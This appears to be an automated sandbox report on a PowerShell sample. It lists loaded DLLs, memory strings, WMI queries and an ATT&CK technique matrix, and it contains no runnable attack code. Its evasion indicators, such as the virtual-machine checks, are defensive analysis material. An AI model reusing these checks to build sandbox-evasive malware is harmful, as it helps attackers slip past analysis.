Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.663085801790.0000021A36A40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdberShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.663052507532.0000021A1C998000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbllj= source: powershell.exe, 00000002.00000002.663090567187.0000021A3709E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.663088206745.0000021A36E04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utomation.pdbdb source: powershell.exe, 00000002.00000002.663088206745.0000021A36D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbh source: powershell.exe, 00000002.00000002.663052507532.0000021A1C998000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdba-k[ source: powershell.exe, 00000002.00000002.663088206745.0000021A36D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: powershell.exe, 00000002.00000002.663089995476.0000021A36E5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: powershell.exe, 00000002.00000002.663089995476.0000021A36E5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdbdw source: powershell.exe, 00000002.00000002.663085801790.0000021A36ABE000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF92ABAD2A5 pushad ; iretd 2_2_00007FF92ABAD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF92ACC799B push ebx; retf 2_2_00007FF92ACC79DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF92ACC22B5 pushad ; iretd 2_2_00007FF92ACC232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF92ACC0515 pushad ; retf 2_2_00007FF92ACC05ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF92AF37603 push edi; retf 2_2_00007FF92AF37606

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9734Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F55B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000002.00000002.663090567187.0000021A37040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine131190MSFT_MpComputerStatus
Source: powershell.exe, 00000002.00000002.663052507532.0000021A1C998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA
Source: powershell.exe, 00000002.00000002.663088206745.0000021A36D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
